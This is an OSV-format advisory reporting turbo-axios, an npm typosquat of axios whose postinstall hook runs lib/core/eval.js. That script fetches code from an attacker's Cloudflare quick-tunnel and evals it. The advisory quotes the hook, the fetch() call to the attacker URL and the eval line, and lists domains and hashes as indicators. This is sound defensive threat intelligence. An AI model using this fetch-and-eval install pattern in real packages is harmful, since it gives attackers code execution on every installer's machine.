{
  "id": "MAL-2026-4695",
  "summary": "Malicious code in turbo-axios (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (62503451ade68043379968f3dc4784fdb66424d55422854514e3ba1b10058324)\nturbo-axios is a typosquat of the popular axios HTTP client (it re-exports the full axios API and reuses axios's repository/homepage metadata in package.json) carrying an install-time remote code execution payload. package.json declares `\"postinstall\": \"node./lib/core/eval.js\"`. lib/core/eval.js performs `fetch('https://consequences-faces-weblogs-clinical.trycloudflare.com/download/datab1')` and then `await eval(`(async () =\u003e {\\n${datab2}\\n})();`)`, executing the response body as JavaScript inside an async IIFE. The destination is an anonymous, mutable Cloudflare quick-tunnel — not the publisher's infrastructure — and the fetched bytes are not pinned, hashed, or otherwise verified, so the attacker can ship arbitrary code to every installer at any time. The exfil/RCE function is misleadingly named `sendAnalytics`. Any `npm install turbo-axios` results in attacker-controlled code execution on the installer's machine with the privileges of the npm process.\n",
  "modified": "2026-05-26T06:02:59.475877603Z",
  "published": "2026-05-23T15:53:39Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "source": "amazon-inspector",
        "modified_time": "2026-05-23T15:53:39Z",
        "versions": ["1.17.2"],
        "id": "IN-MAL-2026-004349",
        "import_time": "2026-05-26T05:52:25.548235993Z",
        "sha256": "62503451ade68043379968f3dc4784fdb66424d55422854514e3ba1b10058324"
      },
      {
        "source": "amazon-inspector",
        "modified_time": "2026-05-23T16:19:11Z",
        "id": "IN-MAL-2026-004362",
        "versions": ["1.17.3"],
        "import_time": "2026-05-26T05:52:27.098050827Z",
        "sha256": "9d7a284fd6c939193711d8b2892a48375e0d0d1e75022dd2c33799a0df3dd4c8"
      },
      {
        "source": "amazon-inspector",
        "modified_time": "2026-05-23T15:53:40Z",
        "versions": ["1.17.2"],
        "id": "IN-MAL-2026-004350",
        "import_time": "2026-05-26T05:52:25.678412603Z",
        "sha256": "e2a0231d72ca5ebe4597aab01d0bae4a95762789e9be835b563639acea93ceb5"
      },
      {
        "source": "amazon-inspector",
        "modified_time": "2026-05-23T16:14:27Z",
        "id": "IN-MAL-2026-004360",
        "versions": ["1.17.3"],
        "import_time": "2026-05-26T05:52:26.893283628Z",
        "sha256": "f6942a85f7291a7da9e7f27d5502a81308758330fddb9b9e2ad6299a0404bb15"
      }
    ]
  },
  "references": [
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/turbo-axios/v/1.17.2"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/turbo-axios/v/1.17.3"}
  ],
  "affected": [
    {
      "package": {"name": "turbo-axios", "ecosystem": "npm", "purl": "pkg:npm/turbo-axios"},
      "versions": ["1.17.2", "1.17.3"],
      "database_specific": {
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/turbo-axios/MAL-2026-4695.json",
        "indicators": {
          "package_integrity": [
            {
              "hashes": {
                "sha512_sri": "sha512-LluR+Xr/hcuvo6stjwKCseXKUFx6zqfwbHwMMU6DiWbshT6GqyHU0id1Cl++2P7Tv/ugi3TJewlNFOwOO1tRNQ==",
                "sha1": "98b0b5dc911586a4a736c0145157748f2707c4a9"
              },
              "filename": "turbo-axios-1.17.2.tgz"
            }
          ],
          "domains": ["philosophy-moms-incoming-milton.trycloudflare.com"],
          "evidence_files": [
            {
              "path": "lib/core/eval.js",
              "tlsh": "c401d2991abb29235b3992d49e1b140bf3a17a031680e3c9f78883994fb9940c5428ee",
              "sha256": "584dccb79cebc15dc680287617ce7534b6b9860a4b956c0bf5398145c6e08d0d"
            },
            {
              "path": "package.json",
              "tlsh": "ccd1ec73c9ca4d572fb47aa8a87a9264f231c30fa551c90fb17e024c4f7572f129762a",
              "sha256": "cf0961ab23bb2e46e5aea0da5b3f7d6195c76d7f401d1f4f9e7775568eb16b39"
            }
          ]
        },
        "cwes": [
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code", "cweId": "CWE-506"}
        ]
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [{"name": "Amazon Inspector", "contact": ["actran@amazon.com"], "type": "FINDER"}]
}